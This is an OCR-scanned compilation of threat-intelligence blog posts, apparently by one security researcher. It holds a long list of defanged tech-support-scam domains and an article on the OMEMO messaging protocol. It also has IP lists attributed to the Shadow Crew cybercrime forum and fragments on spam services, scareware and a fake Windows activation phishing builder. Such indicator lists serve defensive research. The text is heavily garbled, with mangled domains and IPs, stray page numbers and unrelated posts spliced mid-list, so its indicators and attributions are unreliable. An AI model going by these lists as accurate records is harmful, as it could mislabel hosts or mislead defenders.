winbytes[.]org 
winchatsupport[.]Jcom 
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window8-free-help-customer-service-call-187 7-581-8998[. ]site 
window-download-faliure-support-ppit6990[.]com 
window-sup[.]blogspot[.]com 

window-support[.]co[.]uk 

windownotification[.]Jcom 

windows10customerservice[.]com 

windows1lOhelp[.]support 

windows1l0helpdesk[.]Jcom 

windows10problems|[.]org 

windows10supportcenter[.]Jcom 

windows1lOsupportpage[.]Jcom 
windows10supportphonenumber[.]com 
windows10techsupportphonenumber[.]com 

windows-8[. ]technicalsupportservicesinc[.]com 
windows-10[.]technicalsupportservicesinc[.]com 
windows-10support[.]Jcom 

windows-alert[.]online 

windows-alerts[.]Jonline 

windows-blue-screen-crash[.]xyz 

windows-bug[.]site 
windows-corrupted-browser-not-secure-call-support[. info 
windows-error[.]co 

windows-errorx[.]com 
windows-firewall-security-alert-error-found5[.]info 
windows-has-detected-some-suspicious-activity-from-your-ipqw/[.]in 
windows-has-detected-some-suspicious-activity-fromyourcomputer[.]com 
windows-helplines[.]com 
windows-kernal-warning-error-found-diskread-error[.]com 
windows-security-alert-malware-found-call-support[.]info 
windows-security-alert-system-not-safe-call-support[.]info 
windows-security-alert-system-not-safe-plese-call-support[.]info 
windows-security-alert-virus-found-call-support[. ]info 
windows-security-center-2236[.]info 
windows-server-error[.]info 


windows-server-warning[.]info 
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windows-server-warning[.]us 
windows-support-me[.]com 
windows-support[. ]}windowshelp[.]Support 
windows-system-587632[.]us 
windows-system-alert[.]info 
windows-system-error[.]us 
windows-technical-support[.]com 
windows-techsupport[.]com 
windows-threat[.]com 
windows-virus-alert-risk[.Jonline 
windows-warning-error-found[.]com 
windows[.]technical-care[.]Jcom 
windowsalerts[. ]xyz 
windowscanpage[.]online 
windowscanpage|[.]website 
windowsecuritycounsel[.Jonline 
windowserrorhelps[.]Jcom 
windowserrorsalert[.]com 
windowshelp[.]support 
windowsisnotgenuine[.]com 
windowslivemailcustomerservice[.]Jcom 
windowslivemailsupport[.]net 
windowslivetechsupport[.]com 
windowsmicrosofts[. ]xyz 
windowssecurity-center-2999[.]info 
windowsserver102082308328[. ]xyz 
windowssupportnumbers[.]com 
windowssupportphonenumber[.]com 
windowstechnicalsupportnumbers[.]com 
windowstechsupportphonenumber[.]com 
windowsupport[. Julcraft[.]com 
windowsupportaustralia[.]xyz 
windowsupporthelp247[.]com 
windowsvirusnotification[.]com 
windstream|[.]Supportno[.]com 
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windsupportcare10[.]xyz 
winprotechnologies[.]Jcom 
winsec[. ]biz 
winsurftechnology[.]com 
wintechassist[.]com 
wizxpert[.]com 
wordfiction11[.]info 
worldwebhelper[.]Jcom 
worldwidewebb[.]in 
wormsupport]1[. ]Jinfo 
wormsupport2[. Jinfo 
wormsupport3[.]info 
wormsupport4[. Jinfo 
wormsupport5[. info 
wormsupport[. info 
wormsupports[. Jinfo 
wqeasfas[.]xyz 
wruxqo-atixin[.]xyz 
www-mcafee-com-activate[.]com 
www-norton-com-setup[.]com 
www-support[.]net 
wwwhelpnumber{. Jco[.]uk 
wwwmcafeeactivate[.]com 
wwwmcafeecomactivate[.]co 
wwwoasisinfosolutionin[.]OOOwebhostapp[.]com 
wwwofficecomsetup[.]co 
wwwofficecomsetup[.]net 
wwwofficecomsetup[.]xyz 
x62y[.]com/8n9jd/index[.]php 
xboxhelpline[.]Jcom 
xboxportforwarding[.]com 
xdebugging[.]club 
xerox[.]printersupportaustralia[.]Jcom 
xerox[.]printersupportca[.]Jcom 


xerox[.]printersupportnumbercanada[.]ca 
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xientsupport[.]Jcom 

xurnya-zlysiful.]xyz 
yahoo-customer-care[.]co[.]uk 
yahoo-customer-service[.]org 
yahoo-customer-service[.]us 
yahoo-service-number[.]com 
yahoo-supports[.]Jcom 
yahoo-yahoomail[.]Jcom 

yahoo[. ]australiaemailsupport[.]com 
yahoo[.]klantenservicenederland[.]nl 
yahoo[.]numberireland[.]Jcom 
yahoo[.]supportau[.]com[.]Jau 
yahoo[.]supportaustralia[.]com[.Jau 
yahoo[.]supportnumberaustralia[.]com[.]au 
yahoo[. ]technicalsupportcontact[.]net 
yahoocontact[.]weebly[.]Jcom 
yahoocontactnumber[.]co[.]uk 
yahoocustomercare[.]us 
yahoocustomerservice[.]co[.]uk 
yahoocustomerservice[.]org 
yahoocustomerservicephonenumber[.]us 
yahoocustomerservices[.]net 
yahooservice[.]Jonline 
yahoosupporstaustralia[.]blogszino[.]com 
yahoosupport[.]blogszino[.]com 
yahoosupport[.]customerhelpusa[.]com 
yahoosupportau[.]skyrock[.]Jcom 
yahoosupportaustralia[.]com[.]au 
yahoosupportcenter[.]com 
yahoosupporthelp[.]com 
yahoosupportnumber[.]com|[.]au 
yahoosupportnumberau[.]wordpress[.]Jcom 
yahoosupporttech[.]Jcom 
yahootechsupport[.]site[.]pro 
ydeveloper[.]Jcom 
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yippeetech[.]co[.]uk 
ymailcustomerservice[.]Jcom 
yournetworkreports[. ]xyz 
yourpcassistant[.]Jcom 
yourtechbay[.]com 
youtubemail[. info 
youworldtrips[.]online 
ysence[.]Jcom 
ysupportnumber[.]com 
z2s-microsoft[.]info 
zakazeniepoprawa|[.]com 
zeus-virus-caused-system-corruption-contact[. ]info 
zeusalert-1[.]xyz 
zeusalert-2[.]xyz 
zeusalert-3[.]xyz 
zeusalert-4[.]xyz 
zeusalert-5[.]xyz 
zeusalert-6[.]xyz 
zeusalert-7[.]xyz 
zeusalert-9[.]xyz 
zeusalert-10[.]xyz 
zeusalert-11[.]xyz 
zeusalert-12[.]xyz 
zeusalert-13[.]xyz 
zeusalert-14[.]xyz 
zeusalert-15[.]xyz 
zeuswin21147[.]in 
znetworks[.]net 
zonealarmantivirussupport[.]com 
zumbalamsadal[. ]xyz 
zyngahelp[.]Jcom 

Stay tuned! 


1. https: //blogger.googleusercontent .com/img/a/AVvXsEjeY_EFX02EbS7sCt50kJn61605Bq8v890cEJOHiryTexnnWXkqpKiz8K 
DeufU- xh5U_AKYElosnW56FjtqxpMNNh6G8bVC8pxXXu1iZ1dELTd0 


19159 


18.1.33 The Evolution of Encrypted IM Messenging Platforms - The Rise and Future 
of the OMEMO Protocol - An Analysis (2022-01-28 16:14) 


[1] 
Dear blog readers, 


I’ve decided to share with everyone an article that I’ve been recently working on namely the 
rise of the OMEMO real-time Jabber/XMPP encryption protocol and also discuss in-depth the 
security risks involved in OMEMO type of communications including to offer practical security 
and privacy recommendation advice which | originally wrote for my ex-employer [2]Armadillo 
Phone. 


In a modern and vibrant secure and encrypted mobile device ecosystem facing various hard- 
ware and physical security type of threats including the general rise of insecure WiFi hotspots 
and various other factors including the rise of various nation-state and rogue and malicious 
advanced persistent threat type of malicious and fraudulent campaigns a new protocol has 
recently emerged called OMEMO basically limiting the burden of online ID verification mecha- 
nisms and adding a new set of privacy and security enhancing features to modern instant mes- 
saging applications making it hard potentially virtually impossible for a malicious attacker to 
eavesdrop and intercept an OMEMO user’s personal private including sensitive and personally 
identifiable information further aiming to commit financial fraud and launch a variety of social 
engineering campaigns aimed at targeting the victim’s address book and the confidentiality 
availability and integrity of their devices further exposing the mobile device to a multi-tude of 
malicious and fraudulent software and rogue and malicious campaigns. 


Protocol Introduction 


What exactly is OMEMO? Long story short it’s an OTR and OpenPGP-based communication 
protocol that actually has a lot of new improvements in terms of privacy and security includ- 
ing interoperability between multiple IM clients and mobile applications courtesy of different 
vendors. Compared to OTR (Off-the-Record) which basically allows single-user type of secure 
and encrypted communication the OMEMO protocol actually allows multi-user type of data and 
information exchange further strengthening the protocol’s position on the market for secure 
mobile IM (instant messaging) applications. 


Basic OTR Protocol Overview in the context of the global growing cybercrime trend 


Throughout the years Jabber’s OTR (Off-the-Record) plugin and feature quickly became the 
de-facto communication channel for a huge portion of Eastern European and Russia-based 
cybercriminals looking for ways to properly offer and present their cybercrime-friendly ser- 
vices including to actively communicate with each other for the purpose of managing and 
launching cybercrime-friendly online communities including to actually offer a newly launched 
cybercrime-friendly service or a tool and actually reach out to current and potential customers 
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in a secure fashion. It should be worth pointing out over 98 % of Russian and Eastern Euro- 
pean cybercrime-friendly propositions actively rely on the use of public and private proprietary 
Jabber-based servers and active OTR (Off-the-Record) type of communications. How does the 
process work in terms of Russian and Eastern European cybercrime gangs and groups? Pretty 
simple. Basically the cybercriminal in question would either use a custom-made and set up pro- 
prietary Jabber-server or a publicly accessible one in combination with a popular off-the-shelf 
or proprietary offshore VPN service provider to actually attempt to hide the actual metadata 
from law enforcement and would then include the actual contact details in terms of user ID 
within the actual cybercrime-friendly proposition which on the majority of occasions is a newly 
launched stolen and compromised credit card shop or a newly launched cybercrime-friendly 
service aiming to assist novice or experienced cybercriminals on their way to commit financial 
fraud online. 


The following mobile device IM clients are known be currently compatible with the OMEMO 
secure and privacy-enhancing protocol: 

* BeaglelM 

¢ ChatSecure 

* Conversations 

¢ Cryptocat 

¢ Dino 

¢ Gajim 

¢ Psi 


e Adium 


Profanity 
¢ SiskinIM 


Possible Threat Modelling Scenarios 


It should be worth pointing out that on the vast majority of occasions the majority of IM-based 
encryption protocols are perfectly suited to respond and actually protect against a large por- 
tion of modern eavesdropping and surveillance campaigns. It should be also noted that a 
direct compromise of the actual mobile device or a device in question might be successfully 
acting as the "weakest link" in the entire secure and privacy-conscious communication chain 
including the actual impersonation attacks launched against a specific participant in the actual 
communication next to good old fashioned social engineering type of campaigns. 


Possible physical security and network-based attack scenarios: 
- physical device compromise 


A possible device compromise through device stealing or actually obtaining a physical copy of 
the device for digital forensic examination by third-parties. Users interested in protecting their 
personal including sensitive IM communication should definitely look into using time-expiring 
messages with a short period of time and actually take advantage of Armadillo Phone’s built- 
in advanced physical protection features including the availability of anti-theft token and NRC 
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physical authentication card including heavy reliance on off-the-shelf and heavily modified 
going beyond industry-standards implementation of popular encryption ciphers. 


- network communication provider compromise 


Among the key factors to consider when attempting to actually launch an encrypted IM conver- 
sation with a colleague or a friend including possible third-party that also includes a journalist 
or a free speech writer is to ensure that the network infrastructure provider has taken all the 
necessary measures to protect its network from external and internal cyber attacks including 
plain simple social engineering attempts and active network-based reconnaissance and actual 
network-based infrastructure compromise. A possible attack surface mitigation scenario here 
would be the use of a vendor-specific VPN (Virtual Private Network) further ensuring that the 
actual metadata including actual traffic obfuscation will prevent possible man-in-the-middle 
attacks launched through the use of insecure WiFi hotspots or the actual GSM-based 3G/4G/5G 
type of network connectivity infrastructure. 


The Armadillo Phone has a built-in VPN (Virtual Private Network) service built-in which is free 
of charge and can heavily assist in possible network-based metadata obfuscation including 
actual network-traffic obfuscation making it harder for a malicious attacker including rogue 
actors to actually attempt to launch a possible eavesdropping or active traffic interception or 
surveillance campaign. 


A rather practical and often neglected privacy-conscious advice would be to periodically verify 
the actual participant’s fingerprint by asking a very specific question that only he knows the 
answer to. 


Stay tuned! 


1. https: //blogger . googleusercontent . com/img/a/AVvXsEgt AKxazmEf 6yTgPgkKVBV9t 1652tEAshFr J3ZQ3-Lyleq4dyta9dyuw4! 
gNnp2HbJ6uDN_GfG6f1NzT4GQ-mc5ZVcVxBvSdVspzKO1qM6W8zCb4 
2. https: //www.armadillophone.com/ 


18.1.34 Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communi- 
ties IP Addresses - An OSINT Analysis (2022-01-28 16:16) 


Dear blog readers, 
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ACE | erpA0t | Mad | Make ADL Your Homepage | Search * AOL 6 Al Signin 


e AOL Hometown @ is Closing its Doors. 


Find out how to BACK UP AND SAVE YOUR FILES before we say goodbye for good. 


AOL > JOUPMALS woe: movgies Your wey ‘Search 


What's Hot | Magic Senoke 
catineault19 scandal news 
Pebtc Journal 


Thursday, October 2, 2008 


reborns fake baby 


reborns 


Click here to see movie 


What do all of these bogus blogs have in common? The fact that they are all being abused 
by a single malware campaign, and the Keep it Simple Stupid mentality only a lazy malware 
Campaigner can take advantage of. All of the blogs as using a central redirection domain, 
shutting it down or blocking it renders the number of bogus blogs is circulation irrelevant. In 
this case, the domain in question is video.xmancer.org (216.195.59.75). 


Here are the the rest of the domains participating in the campaign, as well as the parked ones 
at the corresponding IPs : 


video.xmancer .org (216.195.59.75) 
buynowbe .com 

loveniche .com 

antivirus-freecheck .com 
jetelephone .cn 

reducki .cn 

woteenhas .cn 

lilaloft .cn 


clipztimes .com (78.157.143.235) 
imagelized .com 
vidzdaily .com 
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I’ve decided to share with everyone a currently active portfolio of IM screen names from the 
infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Tech- 
nical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber 
threat actor profiling campaigns. 


Sample Shadow Crew cybercrime-friendly forum community IP addresses accounts: 
61[.]153[.]225[.]253 
61[.]156[.]17[.]164 
61[.]159[.]174[.]31 
216[.]12[.]218[.]213 
61[.]172[.]195[.]167 
1[.]3[.]5[.]112 
61[.]175[.]211[.]198 
64[.]82[.]92[.]118 
218[.]62[.]16[.]38 
61[.]151[.]251[.]199 
61[.]158[.]185[.]39 
213[.]98[.]75[.]135 
5[.]3[.]2[.]34 
211[.]147[.]61[.]151 
64[.]82[.]91[.]117 
212[.]181[.]134[.]31 
194[.]226[.]242[.]33 
217[.]126[.]111[.]6 
61[.]172[.]247[.185 
212[.]57[.]166[.]1 
5[.]5[.]9[.]14 
1[.]3[.J1[.]5 
64[.]82[.]93[.]122 
211[.]99[.]223[.182 
211[.]184[.]253[.]5 
62[.]118[.]252[.]125 
194[.]128[.]167[.]4 
2[.]59[.]47[.]155 
12[.]253[.]74[.134 
216[.]223[.]197[.]49 
62[.]119[.]36[.]132 
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12[.]124[.]179[.]81 
12[.]122[.]11[.]9 
12[.]122[.]11[.]214 
62[.]12[.]32[.]74 
62[.]119[.]36[.]255 
63[.]146[.]4[.]162 
211[.]233[.]27[.]188 
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In short, despite that the campaign is poised to attract generic search traffic, it’s a self- 
exposing blackhat SEO campaign since each and every blog participating is also linking to the 
rest of the ones within the ecosystem. 
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A [1]managed spam vendor always has to raise the stakes during its introduction period 
on the market. But what happens when a market follower starts using the market leader’s 
proprietary [2] managed spamming system, and is able to provide better spamming rates at a 
cheaper prices? Market forces and unethical competition at its best. 


So, what is this market challenger using the monopolist’s - in respect to managed spamming 
services not spam in general - proprietary system ([3]Spamming vendor launches managed 
spamming service) up to anyway? Promising and delivering, 1, 400,000 emails daily, 60,000 
mails per hour, and 100 emails per minute. What we've got here are the spam metrics out 
of 5 already finished spam campaigns that has managed to sent out a million soam emails 
using only 2000 malware infected hosts. Also, CC-ing and BCC-ing made it possible to multiple 
the effect of the campaign and increase the total number of emails spammed. Talking about 
benchmarks, 789 emails per minute at a rate of 12/13 emails per second is a pretty good 
one, considering it’s only 2k bots that they were using. What they also promise is automatic 
rotation of IPS upon automatically checking them against public blacklists, and a mix rotation 
of IPs from their own netblocks located in Russia and Germany with the fresh IPs coming from 
the newly infected hosts. 


Earlier this month, | discussed the market leader’s [4]Jmanaged spamming system, ac- 
cess to which they also offer for rent : 
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"An inside look of the system obtained on 2008-08-12 indicates that they are indeed capa- 
ble of delivering what they promise - speed, simplicity and 5000 malware infected hosts. 
Moreover, the attached screenshot demonstrates that 20 different email databases can be 
simultaneously used resulting in 16,523,247 emails about to get spammed using 52 different 
macroses. Furthermore, what they refer to as a dynamic set of regional servers aiming to 
ensure that the central server never gets exposed, is in fact fast-flux which depending on how 
many bots they are willing to put into “rtsegional server mode” shapes the size of the fast-flux 
network at a later stage." 


With cutting edge managed spam services like the ones currently in circulation, it re- 
mains to be seen whether or not spammers would migrate to this outsourcing model, or 
continue coming up with adaptive ways to send out their scams and malware on their own. 


1. http: //ddanchev. blogspot .com/2007/10/managed-spamming-appliances-future-of .html 


2. http: //ddanchev. blogspot .com/2008/07/dissecting-managed- spamming-service. html 
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Activate Windows 


#2 Windows 


In a self-contradicting social engineering attempt, a malware author is offering to sale a 
([1]updated version of Kardphisher) DIY fake Windows XP activation builder, which despite the 
fact that it claims "We will ask for your billing details, but your credit card will NOT be chargea", 
is requesting and remotely uploading all the credit card details required for a successfully 
credit card theft. 


Perhaps among the main reasons why such simplistic social engineering attempts never 
scaled in a "malicious economies of scale" approach, is because sophisticated crimeware 
kits capable of obtaining the very same data automatically, started leaking for everyone to 
start taking advantage of - including yesterday’s cybercriminals using such DIY fake message 
builders. 
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Moreover, according to [2]recently reseased survey results, end users cannot distinguish 
between fake popups and real ones, and on their way to continue doing what they were doing, 
click OK on that pesky warning message telling them that they’re about to get infected with 
malware. Taking into consideration the fact that the popup windows the researchers used 
look like cheap creative compared to the average fake security software’s layout high quality 
GUls, it is perhaps worth restating your research questions with something in the lines of - 
What motivates end users to install an antivirus application going under the name of Super 
Antivirus 2009 or Mega Virus Cleaner 2008? The fact that the fake status bar is telling them 
that they’re infected with 47 spyware cookies, or the fact that they ended up at the fake site 
while browsing their trusted web services? 


Activate Windows 


Z Windows 


Select your location... v| 


| Card Type x 
| Select Month y| Year v| 


The increase of [3]rogue security software domains is happening due to the high payout affil- 
iation based model, the standardized creative allowing the participants to come up with their 
own fake names if they want to, and due to the fact that the fake security threats scareware 
approach seems to be perfectly taking advantage of the overall suspicion on the effectiveness 
of their legitimate security software. 


1. http: //www.symantec.com/security_response/writeup . jsp?docid=2007-042705-0108-99 
2. http: //news .ncsu.edu/news/2008/09/wmswogalterfakemessage. php 
3. http: //ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_30.html 
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216[.]151[.]92[.]2 
216[.]155[.]75[.]235 
19214 


216[.]252[.]226[.]5 
216[.]64[.]154[.]27 
216[.]93[.]32[.]3 
216[.]93[.]49[.]169 
217[.J127[.]248[.]37 
217[.]56[.]24[.]114 
217[.]59[.]178[.177 
217[.]59[.]178[.]78 
24[.]76[.188[.J254 
24[.]78[.18[.]254 
61[.]137[.]91[.]59 
61[.]8[.]24[.]137 
62[.]163[.]211[.]91 
63[.]113[.]242[.]214 
63[.]78[.]224[.]33 
64[.]164[.]243[.]146 
64[.]57[.]215[.]17 
64[.]57[.]216[.J125 
64[.]71[.]128[.]84 
64[.]77[.]63[.]14 
64[.]86[.]196[.]11 
65[.]125[.]1[.18 
65[.]25[.]96[.14 
66[.]45[.]56[.]244 
66[.]66[.]165[.J232 
148[.]223[.]199[.]93 
148[.]245[.]146[.]125 
213[.]154[.]74[.]126 
218[.]5[.]148[.]127 
61[.]135[.]131[.]5 
65[.]114[.]124[.]181 
66[.]13[.]77[.]82 
4[.]65[.J222[.]76 
148[.]223[.]35[.]198 
159[.]226[.]117[.]66 


19215 


24[.]123[.]91[.]18 
24[.]214[.]16[.J225 
24[.]88[.]32[.]52 
211[.]142[.]226[.]68 
211[.]91[.]255[.]28 
211[.]91[.]7[.]57 
211[.]97[.]117[.136 
211[.]99[.]158[.]75 
212[.]111[.]6[.]31 
213[.]154[.]77[.]164 
213[.]157[.]171[.]47 
213[.]13[.]59[.]177 
213[.]29[.]98[.134 
213[.]246[.]72[.]242 
194[.]143[.]235[.]221 
194[.]228[.]124[.]218 
194[.]79[.]117[.]166 
216[.]129[.]132[.]3 
216[.]28[.]218[.]26 
196[.]25[.]188[.]79 
196[.]26[.]167[.]36 
196[.]3[.]87[.182 
217[.]21[.]95[.]158 
217[.]35[.]139[.]145 
217[.]219[.]78[.18 
217[.]98[.]9[.]222 
218[.]5[.]14[.]244 
218[.]7[.]16[.]114 
218[.]76[.]88[.]4 
218[.]76[.]241[.]2 
61[.]131[.]47[.]2 
61[.]133[.]229[.]162 
61[.]153[.]228[.]154 
61[.]11[.]244[.]26 
61[.]13[.]136[.]75 
19216 


61[.]179[.]117[.]184 
61[.]182[.]248[.]38 
61[.]184[.]246[.]153 
61[.]185[.]212[.]54 
61[.]185[.]92[.]125 
62[.]42[.]152[.]48 
62[.]57[.]49[.]246 
65[.]64[.]123[.]213 
66[.]149[.]167[.]146 
66[.]54[.]228[.]79 
66[.]236[.]88[.]196 
66[.]75[.]161[.]195 
211[.]158[.]18[.]234 
12[.]152[.]196[.]4 
211[.]75[.]225[.]43 
212[.]88[.]84[.]94 
213[.]29[.]98[.]24 
194[.]239[.]175[.]188 
195[.]47[.]52[.]142 
218[.]62[.]6[.]131 
218[.]76[.]78[.]134 
61[.]175[.]235[.]112 
61[.]188[.]216[.]53 
62[.]48[.]188[.J233 
62[.]56[.]251[.]68 
62[.]73[.]214[.]26 
63[.]214[.]255[.]76 
63[.]229[.]138[.]114 
65[.]116[.]164[.]9 
65[.]118[.]253[.]68 
66[.]126[.]249[.]58 
66[.]167[.]2[.J154 
66[.]89[.]67[.]36 
217[.J198[.]14[.]252 
217[.]59[.]45[.]74 


19217 


218[.]7[.]16[.]119 
218[.]65[.]17[.]182 
198[.]31[.]147[.]34 
61[.]188[.]177[.]11 
62[.]42[.]8[.]41 
66[.]128[.]171[.]16 
67[.]33[.]39[.]123 
151[.]38[.]133[.]123 
213[.)4[.]22[.]15 
195[.]34[.]146[.]189 
216[.]57[.]14[.]3 
12[.]153[.]68[.J131 
4[.]35[.]84[.]98 
61[.]129[.]121[.]25 
62[.]48[.]8[.]129 
131[.]165[.]146[.]141 
166[.]114[.]127[.]217 
24[.]97[.]22[.]2 
212[.]138[.]64[.J171 
62[.]24[.]87[.]138 
62[.]58[.]97[.]251 
212[.]185[.]42[.]179 
217[.]56[.]69[.]162 
212[.]138[.]64[.]173 
166[.]114[.]127[.]6 
195[.]146[.]82[.]138 
62[.]57[.]3[.]112 
61[.]157[.]184[.]28 
211[.]161[.]171[.]3 
148[.]64[.]144[.]17 
211[.]97[.]147[.178 
63[.]95[.]81[.]246 
66[.]12[.]237[.]242 
211[.]155[.]246[.]219 
163[.]24[.]21[.]117 
19218 


24[.]132[.]217[.]59 
195[.]85[.]188[.]66 
213[.]98[.]122[.]122 
163[.]24[.]45[.]117 
216[.]53[.]169[.]154 
216[.]58[.]75[.]247 
193[.]251[.]153[.]5 
61[.]159[.]174[.]82 
194[.]72[.]54[.]131 
212[.]135[.]186[.]114 
211[.]184[.J121[.]253 
211[.]185[.]176[.]1 
216[.]62[.]222[.]188 
61[.]177[.]173[.18 
61[.]242[.]153[.]194 
218[.]4[.]46[.]114 
62[.]117[.]74[.]196 
217[.]33[.]71[.]98 
218[.]11[.]26[.]139 
61[.]153[.]225[.]66 
24[.]94[.]5[.]241 
24[.]94[.]6[.177 
217[.]34[.]168[.]147 
212[.]52[.]132[.]22 
211[.]185[.]172[.]65 
218[.]16[.]126[.]229 
61[.]11[.]75[.]131 
213[.]234[.]124[.]23 
121[.]172[.]148[.]23 
143[.]134[.]54[.]67 
123[.]34[.]34[.]3 
213[.]213[.]22[.]1 
212[.]138[.]64[.]172 
216[.]144[.]33[.]72 
216[.]144[.]33[.]69 


19219 


193[.]126[.]124[.]33 
213[.]134[.]198[.]226 
216[.]144[.]33[.]71 
212[.]6[.]92[.]67 
195[.]29[.]95[.]245 
168[.]11[.]71[.]3 
212[.]119[.]79[.]67 
192[.]114[.]177[.]217 
211[.]57[.]214[.174 
195[.]151[.]94[.]82 
164[.]164[.]59[.]2 
194[.]78[.]173[.]143 
195[.]34[.]32[.]11 
196[.]3[.]64[.]85 
148[.]233[.]111[.]232 
193[.]219[.]28[.]144 
195[.]39[.]134[.]81 
216[.]167[.]47[.]25 
194[.]212[.]26[.J129 
213[.]14[.]46[.]58 
12[.]146[.]236[.]34 
149[.]156[.]9[.]242 
148[.]233[.]159[.]249 
213[.]14[.]6[.]98 
211[.J1[.]156[.]252 
213[.]14[.]6[.]2 
213[.]14[.]6[.]197 
213[.]14[.]45[.]188 
213[.]14[.]3[.]15 
131[.]234[.]22[.]29 
213[.]14[.]4[.]3 
213[.]14[.]6[.]4 
194[.]25[.]184[.]58 
213[.]14[.]3[.]174 
212[.]29[.]81[.]226 
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63[.]145[.]62[.]99 
193[.]226[.]6[.]183 
213[.]14[.]4[.]252 
213[.]14[.]3[.J116 
213[.]14[.]4[.]49 
63[.]163[.]68[.]115 
63[.]241[.]92[.]45 
212[.]29[.]111[.]51 
62[.]142[.]81[.]52 
212[.]29[.]117[.]97 
213[.]14[.]46[.]98 
62[.]159[.]42[.]173 
216[.]52[.]98[.]174 
213[.]14[.]4[.J]125 
63[.]88[.]93[.14 
213[.]14[.]7[.]255 
211[.]9[.]49[.]228 
213[.]14[.]4[.]68 
193[.]188[.]97[.]152 
213[.]14[.]6[.]198 
148[.]233[.]159[.]25 
195[.]224[.]246[.]18 
213[.]14[.]3[.]144 
212[.]29[.]111[.]157 
213[.]14[.]4[.]71 
194[.]199[.]196[.]7 
63[.]241[.]92[.]42 
212[.]178[.]7[.]52 
217[.]8[.133[.]76 
212[.]113[.]35[.]174 
154[.]141[.]246[.]96 
128[.]121[.]235[.]252 
213[.]253[.]16[.]174 
128[.]121[.]247[.158 
66[.]119[.]34[.]38 
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212[.]29[.]83[.]12 
128[.]121[.]235[.]251 
193[.]15[.]237[.]6 
194[.]72[.]9[.137 
193[.]97[.J251[.J114 
62[.]159[.]42[.]163 
211[.]32[.]116[.]136 
63[.]231[.]69[.]234 
194[.]65[.]85[.]24 
192[.]115[.]8[.]147 
216[.]128[.]197[.]18 
128[.]121[.]235[.]254 
212[.]178[.]7[.]53 
211[.]28[.]96[.]71 
66[.]119[.]33[.]134 
159[.]83[.]166[.]14 
193[.]15[.]237[.]3 
159[.]83[.]127[.]119 
217[.]129[.]126[.]196 
148[.]233[.]239[.]24 
195[.]72[.]228[.]159 
193[.]193[.]255[.]35 
193[.]227[.]168[.]139 
217[.]21[.]95[.]93 
216[.]155[.]73[.]72 
213[.]14[.]46[.]29 
194[.]93[.J171[.J124 
132[.]254[.]192[.]11 
148[.]246[.]159[.]66 
152[.]157[.]178[.]4 
148[.]235[.]159[.]234 
217[.]129[.]112[.]1 
213[.]14[.]46[.]123 
64[.]83[.J129[.]11 
213[.]14[.]3[.]56 
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Following the ongoing development of a particular web based malware, always comes handy 
in terms of assessing [1]the commoditization of [2]Janti-debugging features within modern 
malware. With plain simple, "managed binary crypting and firewall bypassing verification" on 
demand in February, to August’s overall anti antivirus software mentality as a key differentia- 
tion factor of the malware. 
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So what are they working on? Anti tracing and emulation protection, PeiD and PESniffer 
protection, as well as anti heuristic scanning with a simple junk data adding feature in order 
to maintain a smaller binary size. 


Here’s a translated description : 


1925 


217[.J129[.]112[.]4 
217[.J129[.]126[.]212 
217[.J129[.]112[.]136 
213[.]25[.]91[.]194 
212[.]178[.]7[.]81 
62[.]253[.]128[.]8 
193[.]58[.]194[.]231 
213[.]152[.]93[.]3 
148[.]235[.]127[.]52 
211[.]114[.]143[.]1 
217[.]129[.]113[.]136 
212[.]126[.]15[.]31 
194[.]143[.]232[.]92 
216[.]56[.]46[.]2 
194[.]42[.]128[.]22 
148[.]233[.]159[.]247 
212[.]29[.]171[.]1 
212[.]29[.]119[.]244 
212[.]29[.]117[.]189 
212[.]29[.]119[.]237 
217[.]129[.]112[.]98 
212[.]131[.]224[.]68 
159[.]83[.]166[.16 
195[.]46[.]78[.]19 
212[.]29[.]111[.]7 
128[.]121[.]235[.]249 
217[.J129[.]112[.]75 
212[.]29[.]163[.]35 
213[.]165[.]32[.]133 
198[.]51[.J214[.]2 
148[.]244[.]84[.J251 
195[.]146[.]111[.138 
217[.J129[.]114[.]111 
212[.]29[.]116[.]25 
217[.J129[.]112[.]114 
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212[.]43[.]196[.]81 
217[.J129[.]112[.]55 
217[.J129[.]112[.]129 
217[.]129[.]124[.]118 
217[.]129[.]124[.]152 
217[.J]129[.]124[.]34 
217[.]129[.]125[.]186 
217[.J129[.]121[.]9 
212[.]29[.]117[.198 
66[.]119[.]33[.]166 
217[.J129[.]124[.]4 
212[.]29[.]84[.]234 
212[.]29[.]82[.]233 
62[.]157[.]215[.]145 
212[.]29[.]111[.]236 
211[.]184[.]2[.]252 
61[.]9[.]26[.]2 
165[.]139[.]172[.]22 
63[.]241[.]92[.]44 
216[.]56[.]24[.138 
212[.]126[.]144[.]12 
217[.]129[.]113[.]137 
199[.]84[.]183[.]97 
62[.]77[.]115[.]82 
211[.]162[.]187[.]117 
213[.]14[.]46[.]239 
213[.]14[.]45[.]213 
213[.]14[.]6[.]83 
212[.]29[.]115[.]199 
212[.]126[.]15[.]1 
148[.]246[.]23[.]179 
212[.]27[.]195[.]193 
193[.]86[.]84[.]241 
217[.]195[.]81[.]2 
163[.]28[.]144[.]8 
19224 


24[.]118[.]164[.]79 
161[.]132[.]184[.]118 
62[.J215[.]22[.J235 
212[.]124[.]66[.]213 
62[.]215[.]27[.]44 
61[.]11[.]46[.]14 
64[.]86[.]24[.]174 
62[.]215[.]237[.]188 
24[.]232[.]85[.]13 
62[.]215[.]236[.]91 
62[.]215[.]28[.J157 
62[.]215[.]26[.]43 
166[.]114[.]114[.]243 
213[.]49[.]35[.]61 
81[.]85[.]31[.]1 
211[.]162[.]251[.]245 
62[.]215[.]18[.]196 
62[.]215[.]236[.]195 
62[.]215[.]23[.]192 
194[.]165[.]141[.]19 
62[.]215[.]18[.]8 
212[.]175[.]249[.]2 
217[.]39[.]22[.]166 
212[.]93[.]166[.]218 
212[.]93[.]167[.]181 
62[.J215[.]22[.]41 
128[.]97[.]42[.]4 
213[.]181[.]55[.]72 
194[.]165[.]17[.]168 
212[.]47[.]129[.]58 
62[.]215[.]237[.]33 
62[.]42[.]6[.]144 
211[.]233[.]36[.]66 
196[.]42[.]44[.]96 
66[.]28[.]75[.]232 
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218[.]5[.]77[.]35 
216[.]87[.]31[.J255 
66[.]11[.]162[.]145 
66[.]11[.]162[.]146 
168[.]216[.]25[.J172 
193[.]188[.]87[.]35 
193[.]217[.]66[.]7 
193[.]29[.]2[.]13 
194[.]219[.]144[.J211 
194[.]65[.]77[.]1 
195[.]161[.]188[.]33 
195[.]22[.]169[.]129 
195[.]22[.]176[.J226 
195[.]47[.]14[.]193 
